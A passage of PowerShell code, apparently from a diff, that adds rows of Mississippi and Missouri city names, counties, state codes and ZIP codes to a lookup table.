= $Cities.Rows.Add("Bruce","Calhoun","Mississippi","MS","28","38915") + $null = $Cities.Rows.Add("Calhoun city","Calhoun","Mississippi","MS","28","38916") + $null = $Cities.Rows.Add("Carrollton","Carroll","Mississippi","MS","28","38917") + $null = $Cities.Rows.Add("Cascilla","Tallahatchie","Mississippi","MS","28","38920") + $null = $Cities.Rows.Add("Charleston","Tallahatchie","Mississippi","MS","28","38921") + $null = $Cities.Rows.Add("Coffeeville","Yalobusha","Mississippi","MS","28","38922") + $null = $Cities.Rows.Add("Coila","Carroll","Mississippi","MS","28","38923") + $null = $Cities.Rows.Add("Cruger","Holmes","Mississippi","MS","28","38924") + $null = $Cities.Rows.Add("Duck hill","Montgomery","Mississippi","MS","28","38925") + $null = $Cities.Rows.Add("Enid","Tallahatchie","Mississippi","MS","28","38927") + $null = $Cities.Rows.Add("Glendora","Tallahatchie","Mississippi","MS","28","38928") + $null = $Cities.Rows.Add("Gore springs","Grenada","Mississippi","MS","28","38929") + $null = $Cities.Rows.Add("Greenwood","Leflore","Mississippi","MS","28","38930") + $null = $Cities.Rows.Add("Holcomb","Grenada","Mississippi","MS","28","38940") + $null = $Cities.Rows.Add("Itta bena","Leflore","Mississippi","MS","28","38941") + $null = $Cities.Rows.Add("Mc carley","Carroll","Mississippi","MS","28","38943") + $null = $Cities.Rows.Add("Minter city","Leflore","Mississippi","MS","28","38944") + $null = $Cities.Rows.Add("Morgan city","Leflore","Mississippi","MS","28","38946") + $null = $Cities.Rows.Add("North carrollton","Carroll","Mississippi","MS","28","38947") + $null = $Cities.Rows.Add("Oakland","Yalobusha","Mississippi","MS","28","38948") + $null = $Cities.Rows.Add("Water valley","Lafayette","Mississippi","MS","28","38949") + $null = $Cities.Rows.Add("Philipp","Tallahatchie","Mississippi","MS","28","38950") + $null = $Cities.Rows.Add("Pittsboro","Calhoun","Mississippi","MS","28","38951") + $null = $Cities.Rows.Add("Schlater","Leflore","Mississippi","MS","28","38952") + $null = $Cities.Rows.Add("Scobey","Tallahatchie","Mississippi","MS","28","38953") + $null = $Cities.Rows.Add("Sidon","Leflore","Mississippi","MS","28","38954") + $null = $Cities.Rows.Add("Sumner","Tallahatchie","Mississippi","MS","28","38957") + $null = $Cities.Rows.Add("Swiftown","Leflore","Mississippi","MS","28","38959") + $null = $Cities.Rows.Add("Tillatoba","Yalobusha","Mississippi","MS","28","38961") + $null = $Cities.Rows.Add("Tippo","Tallahatchie","Mississippi","MS","28","38962") + $null = $Cities.Rows.Add("Tutwiler","Tallahatchie","Mississippi","MS","28","38963") + $null = $Cities.Rows.Add("Vance","Quitman","Mississippi","MS","28","38964") + $null = $Cities.Rows.Add("Water valley","Yalobusha","Mississippi","MS","28","38965") + $null = $Cities.Rows.Add("Webb","Tallahatchie","Mississippi","MS","28","38966") + $null = $Cities.Rows.Add("Winona","Montgomery","Mississippi","MS","28","38967") + $null = $Cities.Rows.Add("Zcta 389hh","Grenada","Mississippi","MS","28","389HH") + $null = $Cities.Rows.Add("Zcta 389xx","Leflore","Mississippi","MS","28","389XX") + $null = $Cities.Rows.Add("Belzoni","Humphreys","Mississippi","MS","28","39038") + $null = $Cities.Rows.Add("Benton","Yazoo","Mississippi","MS","28","39039") + $null = $Cities.Rows.Add("Bentonia","Yazoo","Mississippi","MS","28","39040") + $null = $Cities.Rows.Add("Bolton","Hinds","Mississippi","MS","28","39041") + $null = $Cities.Rows.Add("Brandon","Rankin","Mississippi","MS","28","39042") + $null = $Cities.Rows.Add("Braxton","Simpson","Mississippi","MS","28","39044") + $null = $Cities.Rows.Add("Camden","Madison","Mississippi","MS","28","39045") + $null = $Cities.Rows.Add("Canton","Madison","Mississippi","MS","28","39046") + $null = $Cities.Rows.Add("Brandon","Rankin","Mississippi","MS","28","39047") + $null = $Cities.Rows.Add("Edinburg","Leake","Mississippi","MS","28","39051") + $null = $Cities.Rows.Add("Cary","Sharkey","Mississippi","MS","28","39054") + $null = $Cities.Rows.Add("Clinton","Hinds","Mississippi","MS","28","39056") + $null = $Cities.Rows.Add("Conehatta","Newton","Mississippi","MS","28","39057") + $null = $Cities.Rows.Add("Crystal springs","Copiah","Mississippi","MS","28","39059") + $null = $Cities.Rows.Add("Clinton","Hinds","Mississippi","MS","28","39060") + $null = $Cities.Rows.Add("Delta city","Sharkey","Mississippi","MS","28","39061") + $null = $Cities.Rows.Add("D lo","Simpson","Mississippi","MS","28","39062") + $null = $Cities.Rows.Add("Durant","Holmes","Mississippi","MS","28","39063") + $null = $Cities.Rows.Add("Edwards","Hinds","Mississippi","MS","28","39066") + $null = $Cities.Rows.Add("Ethel","Attala","Mississippi","MS","28","39067") + $null = $Cities.Rows.Add("Fayette","Jefferson","Mississippi","MS","28","39069") + $null = $Cities.Rows.Add("Flora","Madison","Mississippi","MS","28","39071") + $null = $Cities.Rows.Add("Florence","Rankin","Mississippi","MS","28","39073") + $null = $Cities.Rows.Add("Forest","Scott","Mississippi","MS","28","39074") + $null = $Cities.Rows.Add("Georgetown","Copiah","Mississippi","MS","28","39078") + $null = $Cities.Rows.Add("Goodman","Holmes","Mississippi","MS","28","39079") + $null = $Cities.Rows.Add("Harrisville","Simpson","Mississippi","MS","28","39082") + $null = $Cities.Rows.Add("Hazlehurst","Copiah","Mississippi","MS","28","39083") + $null = $Cities.Rows.Add("Hermanville","Claiborne","Mississippi","MS","28","39086") + $null = $Cities.Rows.Add("Holly bluff","Sharkey","Mississippi","MS","28","39088") + $null = $Cities.Rows.Add("Kosciusko","Attala","Mississippi","MS","28","39090") + $null = $Cities.Rows.Add("Lake","Scott","Mississippi","MS","28","39092") + $null = $Cities.Rows.Add("Lena","Leake","Mississippi","MS","28","39094") + $null = $Cities.Rows.Add("Lexington","Holmes","Mississippi","MS","28","39095") + $null = $Cities.Rows.Add("Lorman","Claiborne","Mississippi","MS","28","39096") + $null = $Cities.Rows.Add("Louise","Humphreys","Mississippi","MS","28","39097") + $null = $Cities.Rows.Add("Ludlow","Scott","Mississippi","MS","28","39098") + $null = $Cities.Rows.Add("Zcta 390hh","Copiah","Mississippi","MS","28","390HH") + $null = $Cities.Rows.Add("Zcta 390xx","Humphreys","Mississippi","MS","28","390XX") + $null = $Cities.Rows.Add("Mc adams","Attala","Mississippi","MS","28","39107") + $null = $Cities.Rows.Add("Mc cool","Attala","Mississippi","MS","28","39108") + $null = $Cities.Rows.Add("Madden","Leake","Mississippi","MS","28","39109") + $null = $Cities.Rows.Add("Madison","Madison","Mississippi","MS","28","39110") + $null = $Cities.Rows.Add("Magee","Simpson","Mississippi","MS","28","39111") + $null = $Cities.Rows.Add("Sanatorium","Simpson","Mississippi","MS","28","39112") + $null = $Cities.Rows.Add("Mayersville","Issaquena","Mississippi","MS","28","39113") + $null = $Cities.Rows.Add("Mendenhall","Simpson","Mississippi","MS","28","39114") + $null = $Cities.Rows.Add("Midnight","Humphreys","Mississippi","MS","28","39115") + $null = $Cities.Rows.Add("Mize","Smith","Mississippi","MS","28","39116") + $null = $Cities.Rows.Add("Morton","Scott","Mississippi","MS","28","39117") + $null = $Cities.Rows.Add("Mount olive","Covington","Mississippi","MS","28","39119") + $null = $Cities.Rows.Add("Natchez","Adams","Mississippi","MS","28","39120") + $null = $Cities.Rows.Add("Newhebron","Lawrence","Mississippi","MS","28","39140") + $null = $Cities.Rows.Add("Pattison","Claiborne","Mississippi","MS","28","39144") + $null = $Cities.Rows.Add("Pelahatchie","Rankin","Mississippi","MS","28","39145") + $null = $Cities.Rows.Add("Pickens","Holmes","Mississippi","MS","28","39146") + $null = $Cities.Rows.Add("Piney woods","Rankin","Mississippi","MS","28","39148") + $null = $Cities.Rows.Add("Pinola","Simpson","Mississippi","MS","28","39149") + $null = $Cities.Rows.Add("Port gibson","Claiborne","Mississippi","MS","28","39150") + $null = $Cities.Rows.Add("Puckett","Rankin","Mississippi","MS","28","39151") + $null = $Cities.Rows.Add("Pulaski","Smith","Mississippi","MS","28","39152") + $null = $Cities.Rows.Add("Raleigh","Smith","Mississippi","MS","28","39153") + $null = $Cities.Rows.Add("Learned","Hinds","Mississippi","MS","28","39154") + $null = $Cities.Rows.Add("Redwood","Warren","Mississippi","MS","28","39156") + $null = $Cities.Rows.Add("Ridgeland","Madison","Mississippi","MS","28","39157") + $null = $Cities.Rows.Add("Rolling fork","Sharkey","Mississippi","MS","28","39159") + $null = $Cities.Rows.Add("Sallis","Attala","Mississippi","MS","28","39160") + $null = $Cities.Rows.Add("Sandhill","Rankin","Mississippi","MS","28","39161") + $null = $Cities.Rows.Add("Satartia","Yazoo","Mississippi","MS","28","39162") + $null = $Cities.Rows.Add("Silver city","Humphreys","Mississippi","MS","28","39166") + $null = $Cities.Rows.Add("Taylorsville","Smith","Mississippi","MS","28","39168") + $null = $Cities.Rows.Add("Tchula","Holmes","Mississippi","MS","28","39169") + $null = $Cities.Rows.Add("Terry","Hinds","Mississippi","MS","28","39170") + $null = $Cities.Rows.Add("Tougaloo","Madison","Mississippi","MS","28","39174") + $null = $Cities.Rows.Add("Utica","Hinds","Mississippi","MS","28","39175") + $null = $Cities.Rows.Add("Vaiden","Carroll","Mississippi","MS","28","39176") + $null = $Cities.Rows.Add("Valley park","Issaquena","Mississippi","MS","28","39177") + $null = $Cities.Rows.Add("Pickens","Yazoo","Mississippi","MS","28","39179") + $null = $Cities.Rows.Add("Vicksburg","Warren","Mississippi","MS","28","39180") + $null = $Cities.Rows.Add("Zcta 39183","Warren","Mississippi","MS","28","39183") + $null = $Cities.Rows.Add("Walnut grove","Leake","Mississippi","MS","28","39189") + $null = $Cities.Rows.Add("Wesson","Copiah","Mississippi","MS","28","39191") + $null = $Cities.Rows.Add("West","Holmes","Mississippi","MS","28","39192") + $null = $Cities.Rows.Add("Yazoo city","Yazoo","Mississippi","MS","28","39194") + $null = $Cities.Rows.Add("Zcta 391hh","Adams","Mississippi","MS","28","391HH") + $null = $Cities.Rows.Add("Zcta 391xx","Adams","Mississippi","MS","28","391XX") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39201") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39202") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39203") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39204") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39206") + $null = $Cities.Rows.Add("Pearl","Rankin","Mississippi","MS","28","39208") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39209") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39210") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39211") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39212") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39213") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39216") + $null = $Cities.Rows.Add("Richland","Rankin","Mississippi","MS","28","39218") + $null = $Cities.Rows.Add("Jackson","Hinds","Mississippi","MS","28","39269") + $null = $Cities.Rows.Add("Zcta 392hh","Hinds","Mississippi","MS","28","392HH") + $null = $Cities.Rows.Add("Meridian","Lauderdale","Mississippi","MS","28","39301") + $null = $Cities.Rows.Add("Meridian","Lauderdale","Mississippi","MS","28","39305") + $null = $Cities.Rows.Add("Meridian","Lauderdale","Mississippi","MS","28","39307") + $null = $Cities.Rows.Add("Bailey","Lauderdale","Mississippi","MS","28","39320") + $null = $Cities.Rows.Add("Buckatunna","Wayne","Mississippi","MS","28","39322") + $null = $Cities.Rows.Add("Chunky","Newton","Mississippi","MS","28","39323") + $null = $Cities.Rows.Add("Collinsville","Lauderdale","Mississippi","MS","28","39325") + $null = $Cities.Rows.Add("Daleville","Lauderdale","Mississippi","MS","28","39326") + $null = $Cities.Rows.Add("Decatur","Newton","Mississippi","MS","28","39327") + $null = $Cities.Rows.Add("De kalb","Kemper","Mississippi","MS","28","39328") + $null = $Cities.Rows.Add("Enterprise","Clarke","Mississippi","MS","28","39330") + $null = $Cities.Rows.Add("Hickory","Newton","Mississippi","MS","28","39332") + $null = $Cities.Rows.Add("Lauderdale","Lauderdale","Mississippi","MS","28","39335") + $null = $Cities.Rows.Add("Lawrence","Newton","Mississippi","MS","28","39336") + $null = $Cities.Rows.Add("Little rock","Newton","Mississippi","MS","28","39337") + $null = $Cities.Rows.Add("Louin","Jasper","Mississippi","MS","28","39338") + $null = $Cities.Rows.Add("Louisville","Winston","Mississippi","MS","28","39339") + $null = $Cities.Rows.Add("Macon","Noxubee","Mississippi","MS","28","39341") + $null = $Cities.Rows.Add("Newton","Newton","Mississippi","MS","28","39345") + $null = $Cities.Rows.Add("Noxapater","Winston","Mississippi","MS","28","39346") + $null = $Cities.Rows.Add("Pachuta","Jasper","Mississippi","MS","28","39347") + $null = $Cities.Rows.Add("Paulding","Jasper","Mississippi","MS","28","39348") + $null = $Cities.Rows.Add("Philadelphia","Neshoba","Mississippi","MS","28","39350") + $null = $Cities.Rows.Add("Porterville","Kemper","Mississippi","MS","28","39352") + $null = $Cities.Rows.Add("Preston","Kemper","Mississippi","MS","28","39354") + $null = $Cities.Rows.Add("Quitman","Clarke","Mississippi","MS","28","39355") + $null = $Cities.Rows.Add("Rose hill","Jasper","Mississippi","MS","28","39356") + $null = $Cities.Rows.Add("Scooba","Kemper","Mississippi","MS","28","39358") + $null = $Cities.Rows.Add("Sebastopol","Scott","Mississippi","MS","28","39359") + $null = $Cities.Rows.Add("Matherville","Clarke","Mississippi","MS","28","39360") + $null = $Cities.Rows.Add("Shuqualak","Noxubee","Mississippi","MS","28","39361") + $null = $Cities.Rows.Add("State line","Greene","Mississippi","MS","28","39362") + $null = $Cities.Rows.Add("Stonewall","Clarke","Mississippi","MS","28","39363") + $null = $Cities.Rows.Add("Toomsuba","Lauderdale","Mississippi","MS","28","39364") + $null = $Cities.Rows.Add("Union","Neshoba","Mississippi","MS","28","39365") + $null = $Cities.Rows.Add("Vossburg","Jasper","Mississippi","MS","28","39366") + $null = $Cities.Rows.Add("Waynesboro","Wayne","Mississippi","MS","28","39367") + $null = $Cities.Rows.Add("Zcta 393hh","Greene","Mississippi","MS","28","393HH") + $null = $Cities.Rows.Add("Zcta 393xx","Greene","Mississippi","MS","28","393XX") + $null = $Cities.Rows.Add("Hattiesburg","Forrest","Mississippi","MS","28","39401") + $null = $Cities.Rows.Add("Hattiesburg","Lamar","Mississippi","MS","28","39402") + $null = $Cities.Rows.Add("Bassfield","Jefferson Davis","Mississippi","MS","28","39421") + $null = $Cities.Rows.Add("Bay springs","Jasper","Mississippi","MS","28","39422") + $null = $Cities.Rows.Add("Beaumont","Perry","Mississippi","MS","28","39423") + $null = $Cities.Rows.Add("Brooklyn","Perry","Mississippi","MS","28","39425") + $null = $Cities.Rows.Add("Carriere","Pearl River","Mississippi","MS","28","39426") + $null = $Cities.Rows.Add("Carson","Jefferson Davis","Mississippi","MS","28","39427") + $null = $Cities.Rows.Add("Collins","Covington","Mississippi","MS","28","39428") + $null = $Cities.Rows.Add("Columbia","Marion","Mississippi","MS","28","39429") + $null = $Cities.Rows.Add("Eastabuchie","Jones","Mississippi","MS","28","39436") + $null = $Cities.Rows.Add("Ellisville","Jones","Mississippi","MS","28","39437") + $null = $Cities.Rows.Add("Heidelberg","Jasper","Mississippi","MS","28","39439") + $null = $Cities.Rows.Add("Laurel","Jones","Mississippi","MS","28","39440") + $null = $Cities.Rows.Add("Zcta 39443","Jones","Mississippi","MS","28","39443") + $null = $Cities.Rows.Add("Leakesville","Greene","Mississippi","MS","28","39451") + $null = $Cities.Rows.Add("Agricola","George","Mississippi","MS","28","39452") + $null = $Cities.Rows.Add("Lumberton","Lamar","Mississippi","MS","28","39455") + $null = $Cities.Rows.Add("Leaf","Greene","Mississippi","MS","28","39456") + $null = $Cities.Rows.Add("Moselle","Jones","Mississippi","MS","28","39459") + $null = $Cities.Rows.Add("Neely","Greene","Mississippi","MS","28","39461") + $null = $Cities.Rows.Add("New augusta","Perry","Mississippi","MS","28","39462") + $null = $Cities.Rows.Add("Ovett","Jones","Mississippi","MS","28","39464") + $null = $Cities.Rows.Add("Petal","Forrest","Mississippi","MS","28","39465") + $null = $Cities.Rows.Add("Picayune","Pearl River","Mississippi","MS","28","39466") + $null = $Cities.Rows.Add("Poplarville","Pearl River","Mississippi","MS","28","39470") + $null = $Cities.Rows.Add("Prentiss","Jefferson Davis","Mississippi","MS","28","39474") + $null = $Cities.Rows.Add("Purvis","Lamar","Mississippi","MS","28","39475") + $null = $Cities.Rows.Add("Richton","Perry","Mississippi","MS","28","39476") + $null = $Cities.Rows.Add("Sandersville","Jones","Mississippi","MS","28","39477") + $null = $Cities.Rows.Add("Sandy hook","Walthall","Mississippi","MS","28","39478") + $null = $Cities.Rows.Add("Seminary","Covington","Mississippi","MS","28","39479") + $null = $Cities.Rows.Add("Soso","Jones","Mississippi","MS","28","39480") + $null = $Cities.Rows.Add("Stringer","Jasper","Mississippi","MS","28","39481") + $null = $Cities.Rows.Add("Sumrall","Lamar","Mississippi","MS","28","39482") + $null = $Cities.Rows.Add("Foxworth","Marion","Mississippi","MS","28","39483") + $null = $Cities.Rows.Add("Zcta 394hh","George","Mississippi","MS","28","394HH") + $null = $Cities.Rows.Add("Zcta 394xx","George","Mississippi","MS","28","394XX") + $null = $Cities.Rows.Add("Gulfport","Harrison","Mississippi","MS","28","39501") + $null = $Cities.Rows.Add("Gulfport","Harrison","Mississippi","MS","28","39503") + $null = $Cities.Rows.Add("Gulfport","Harrison","Mississippi","MS","28","39507") + $null = $Cities.Rows.Add("Diamondhead","Hancock","Mississippi","MS","28","39520") + $null = $Cities.Rows.Add("Diamondhead","Hancock","Mississippi","MS","28","39525") + $null = $Cities.Rows.Add("Biloxi","Harrison","Mississippi","MS","28","39530") + $null = $Cities.Rows.Add("Biloxi","Harrison","Mississippi","MS","28","39531") + $null = $Cities.Rows.Add("North bay","Harrison","Mississippi","MS","28","39532") + $null = $Cities.Rows.Add("Gautier","Jackson","Mississippi","MS","28","39553") + $null = $Cities.Rows.Add("Kiln","Hancock","Mississippi","MS","28","39556") + $null = $Cities.Rows.Add("Long beach","Harrison","Mississippi","MS","28","39560") + $null = $Cities.Rows.Add("Mc henry","Stone","Mississippi","MS","28","39561") + $null = $Cities.Rows.Add("Moss point","Jackson","Mississippi","MS","28","39562") + $null = $Cities.Rows.Add("Kreole","Jackson","Mississippi","MS","28","39563") + $null = $Cities.Rows.Add("Ocean springs","Jackson","Mississippi","MS","28","39564") + $null = $Cities.Rows.Add("Ocean springs","Jackson","Mississippi","MS","28","39565") + $null = $Cities.Rows.Add("Pascagoula","Jackson","Mississippi","MS","28","39567") + $null = $Cities.Rows.Add("Pass christian","Harrison","Mississippi","MS","28","39571") + $null = $Cities.Rows.Add("Pearlington","Hancock","Mississippi","MS","28","39572") + $null = $Cities.Rows.Add("Perkinston","Stone","Mississippi","MS","28","39573") + $null = $Cities.Rows.Add("Saucier","Harrison","Mississippi","MS","28","39574") + $null = $Cities.Rows.Add("Waveland","Hancock","Mississippi","MS","28","39576") + $null = $Cities.Rows.Add("Wiggins","Stone","Mississippi","MS","28","39577") + $null = $Cities.Rows.Add("Pascagoula","Jackson","Mississippi","MS","28","39581") + $null = $Cities.Rows.Add("Zcta 395hh","George","Mississippi","MS","28","395HH") + $null = $Cities.Rows.Add("Zcta 395xx","Hancock","Mississippi","MS","28","395XX") + $null = $Cities.Rows.Add("Brookhaven","Lincoln","Mississippi","MS","28","39601") + $null = $Cities.Rows.Add("Bogue chitto","Lincoln","Mississippi","MS","28","39629") + $null = $Cities.Rows.Add("Bude","Franklin","Mississippi","MS","28","39630") + $null = $Cities.Rows.Add("Centreville","Wilkinson","Mississippi","MS","28","39631") + $null = $Cities.Rows.Add("Chatawa","Pike","Mississippi","MS","28","39632") + $null = $Cities.Rows.Add("Crosby","Wilkinson","Mississippi","MS","28","39633") + $null = $Cities.Rows.Add("Fernwood","Pike","Mississippi","MS","28","39635") + $null = $Cities.Rows.Add("Gloster","Amite","Mississippi","MS","28","39638") + $null = $Cities.Rows.Add("Jayess","Lawrence","Mississippi","MS","28","39641") + $null = $Cities.Rows.Add("Kokomo","Marion","Mississippi","MS","28","39643") + $null = $Cities.Rows.Add("Liberty","Amite","Mississippi","MS","28","39645") + $null = $Cities.Rows.Add("Mc call creek","Franklin","Mississippi","MS","28","39647") + $null = $Cities.Rows.Add("Mc comb","Pike","Mississippi","MS","28","39648") + $null = $Cities.Rows.Add("Magnolia","Pike","Mississippi","MS","28","39652") + $null = $Cities.Rows.Add("Meadville","Franklin","Mississippi","MS","28","39653") + $null = $Cities.Rows.Add("Monticello","Lawrence","Mississippi","MS","28","39654") + $null = $Cities.Rows.Add("Oak vale","Jefferson Davis","Mississippi","MS","28","39656") + $null = $Cities.Rows.Add("Osyka","Pike","Mississippi","MS","28","39657") + $null = $Cities.Rows.Add("Roxie","Franklin","Mississippi","MS","28","39661") + $null = $Cities.Rows.Add("Ruth","Lincoln","Mississippi","MS","28","39662") + $null = $Cities.Rows.Add("Silver creek","Lawrence","Mississippi","MS","28","39663") + $null = $Cities.Rows.Add("Smithdale","Amite","Mississippi","MS","28","39664") + $null = $Cities.Rows.Add("Sontag","Lawrence","Mississippi","MS","28","39665") + $null = $Cities.Rows.Add("Summit","Pike","Mississippi","MS","28","39666") + $null = $Cities.Rows.Add("Tylertown","Walthall","Mississippi","MS","28","39667") + $null = $Cities.Rows.Add("Union church","Jefferson","Mississippi","MS","28","39668") + $null = $Cities.Rows.Add("Woodville","Wilkinson","Mississippi","MS","28","39669") + $null = $Cities.Rows.Add("Zcta 396hh","Franklin","Mississippi","MS","28","396HH") + $null = $Cities.Rows.Add("Zcta 396xx","Wilkinson","Mississippi","MS","28","396XX") + $null = $Cities.Rows.Add("Columbus","Lowndes","Mississippi","MS","28","39701") + $null = $Cities.Rows.Add("Columbus","Lowndes","Mississippi","MS","28","39702") + $null = $Cities.Rows.Add("Columbus","Lowndes","Mississippi","MS","28","39704") + $null = $Cities.Rows.Add("Columbus","Lowndes","Mississippi","MS","28","39705") + $null = $Cities.Rows.Add("Aberdeen","Monroe","Mississippi","MS","28","39730") + $null = $Cities.Rows.Add("Ackerman","Choctaw","Mississippi","MS","28","39735") + $null = $Cities.Rows.Add("Artesia","Lowndes","Mississippi","MS","28","39736") + $null = $Cities.Rows.Add("Brooksville","Noxubee","Mississippi","MS","28","39739") + $null = $Cities.Rows.Add("Caledonia","Lowndes","Mississippi","MS","28","39740") + $null = $Cities.Rows.Add("Cedarbluff","Clay","Mississippi","MS","28","39741") + $null = $Cities.Rows.Add("Crawford","Lowndes","Mississippi","MS","28","39743") + $null = $Cities.Rows.Add("Tomnolen","Webster","Mississippi","MS","28","39744") + $null = $Cities.Rows.Add("French camp","Choctaw","Mississippi","MS","28","39745") + $null = $Cities.Rows.Add("Hamilton","Monroe","Mississippi","MS","28","39746") + $null = $Cities.Rows.Add("Kilmichael","Montgomery","Mississippi","MS","28","39747") + $null = $Cities.Rows.Add("Maben","Webster","Mississippi","MS","28","39750") + $null = $Cities.Rows.Add("Mantee","Webster","Mississippi","MS","28","39751") + $null = $Cities.Rows.Add("Mathiston","Webster","Mississippi","MS","28","39752") + $null = $Cities.Rows.Add("Pheba","Clay","Mississippi","MS","28","39755") + $null = $Cities.Rows.Add("Prairie","Clay","Mississippi","MS","28","39756") + $null = $Cities.Rows.Add("Sessums","Oktibbeha","Mississippi","MS","28","39759") + $null = $Cities.Rows.Add("Mississippi stat","Oktibbeha","Mississippi","MS","28","39762") + $null = $Cities.Rows.Add("Steens","Lowndes","Mississippi","MS","28","39766") + $null = $Cities.Rows.Add("Stewart","Montgomery","Mississippi","MS","28","39767") + $null = $Cities.Rows.Add("Sturgis","Oktibbeha","Mississippi","MS","28","39769") + $null = $Cities.Rows.Add("Walthall","Webster","Mississippi","MS","28","39771") + $null = $Cities.Rows.Add("Weir","Choctaw","Mississippi","MS","28","39772") + $null = $Cities.Rows.Add("West point","Clay","Mississippi","MS","28","39773") + $null = $Cities.Rows.Add("Woodland","Chickasaw","Mississippi","MS","28","39776") + $null = $Cities.Rows.Add("Zcta 397hh","Lowndes","Mississippi","MS","28","397HH") + $null = $Cities.Rows.Add("Zcta 397xx","Webster","Mississippi","MS","28","397XX") + $null = $Cities.Rows.Add("","Atchison","Missouri","MO","29","51630") + $null = $Cities.Rows.Add("","Atchison","Missouri","MO","29","51640") + $null = $Cities.Rows.Add("","Clark","Missouri","MO","29","52626") + $null = $Cities.Rows.Add("Chesterfield","St. Louis","Missouri","MO","29","63005") + $null = $Cities.Rows.Add("Arnold","Jefferson","Missouri","MO","29","63010") + $null = $Cities.Rows.Add("Manchester","St. Louis","Missouri","MO","29","63011") + $null = $Cities.Rows.Add("Barnhart","Jefferson","Missouri","MO","29","63012") + $null = $Cities.Rows.Add("Beaufort","Franklin","Missouri","MO","29","63013") + $null = $Cities.Rows.Add("Berger","Franklin","Missouri","MO","29","63014") + $null = $Cities.Rows.Add("Catawissa","Franklin","Missouri","MO","29","63015") + $null = $Cities.Rows.Add("Cedar hill","Jefferson","Missouri","MO","29","63016") + $null = $Cities.Rows.Add("Town and country","St. Louis","Missouri","MO","29","63017") + $null = $Cities.Rows.Add("Crystal city","Jefferson","Missouri","MO","29","63019") + $null = $Cities.Rows.Add("De soto","Jefferson","Missouri","MO","29","63020") + $null = $Cities.Rows.Add("Ballwin","St. Louis","Missouri","MO","29","63021") + $null = $Cities.Rows.Add("Dittmer","Jefferson","Missouri","MO","29","63023") + $null = $Cities.Rows.Add("Crescent","St. Louis","Missouri","MO","29","63025") + $null = $Cities.Rows.Add("Fenton","St. Louis","Missouri","MO","29","63026") + $null = $Cities.Rows.Add("Festus","Jefferson","Missouri","MO","29","63028") + $null = $Cities.Rows.Add("Fletcher","Washington","Missouri","MO","29","63030") + $null = $Cities.Rows.Add("Florissant","St. Louis","Missouri","MO","29","63031") + $null = $Cities.Rows.Add("Florissant","St. Louis","Missouri","MO","29","63033") + $null = $Cities.Rows.Add("Florissant","St. Louis","Missouri","MO","29","63034") + $null = $Cities.Rows.Add("French village","St. Francois","Missouri","MO","29","63036") + $null = $Cities.Rows.Add("Gerald","Franklin","Missouri","MO","29","63037") + $null = $Cities.Rows.Add("Glencoe","St. Louis","Missouri","MO","29","63038") + $null = $Cities.Rows.Add("Gray summit","Franklin","Missouri","MO","29","63039") + $null = $Cities.Rows.Add("Grover","St. Louis","Missouri","MO","29","63040") + $null = $Cities.Rows.Add("Grubville","Franklin","Missouri","MO","29","63041") + $null = $Cities.Rows.Add("Hazelwood","St. Louis","Missouri","MO","29","63042") + $null = $Cities.Rows.Add("Maryland heights","St. Louis","Missouri","MO","29","63043") + $null = $Cities.Rows.Add("Bridgeton","St. Louis","Missouri","MO","29","63044") + $null = $Cities.Rows.Add("Herculaneum","Jefferson","Missouri","MO","29","63048") + $null = $Cities.Rows.Add("High ridge","Jefferson","Missouri","MO","29","63049") + $null = $Cities.Rows.Add("Hillsboro","Jefferson","Missouri","MO","29","63050") + $null = $Cities.Rows.Add("House springs","Jefferson","Missouri","MO","29","63051") + $null = $Cities.Rows.Add("Antonia","Jefferson","Missouri","MO","29","63052") + $null = $Cities.Rows.Add("Labadie","Franklin","Missouri","MO","29","63055") + $null = $Cities.Rows.Add("Leslie","Franklin","Missouri","MO","29","63056") + $null = $Cities.Rows.Add("Lonedell","Franklin","Missouri","MO","29","63060") + $null = $Cities.Rows.Add("Luebbering","Franklin","Missouri","MO","29","63061") + $null = $Cities.Rows.Add("New haven","Franklin","Missouri","MO","29","63068") + $null = $Cities.Rows.Add("Pacific","Franklin","Missouri","MO","29","63069") + $null = $Cities.Rows.Add("Pevely","Jefferson","Missouri","MO","29","63070") + $null = $Cities.Rows.Add("Richwoods","Washington","Missouri","MO","29","63071") + $null = $Cities.Rows.Add("Robertsville","Franklin","Missouri","MO","29","63072") + $null = $Cities.Rows.Add("Saint ann","St. Louis","Missouri","MO","29","63074") + $null = $Cities.Rows.Add("Saint clair","Franklin","Missouri","MO","29","63077") + $null = $Cities.Rows.Add("Sullivan","Franklin","Missouri","MO","29","63080") + $null = $Cities.Rows.Add("Union","Franklin","Missouri","MO","29","63084") + $null = $Cities.Rows.Add("Valles mines","St. Francois","Missouri","MO","29","63087") + $null = $Cities.Rows.Add("Valley park","St. Louis","Missouri","MO","29","63088") + $null = $Cities.Rows.Add("Villa ridge","Franklin","Missouri","MO","29","63089") + $null = $Cities.Rows.Add("Washington","Franklin","Missouri","MO","29","63090") + $null = $Cities.Rows.Add("Rosebud","Gasconade","Missouri","MO","29","63091") + $null = $Cities.Rows.Add("Zcta 630hh","Franklin","Missouri","MO","29","630HH") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63101") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63102") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63103") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63104") + $null = $Cities.Rows.Add("Clayton","St. Louis","Missouri","MO","29","63105") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63106") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63107") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63108") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63109") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63110") + $null = $Cities.Rows.Add("Saint louis","St. Louis city","Missouri","MO","29","63111") + $null = 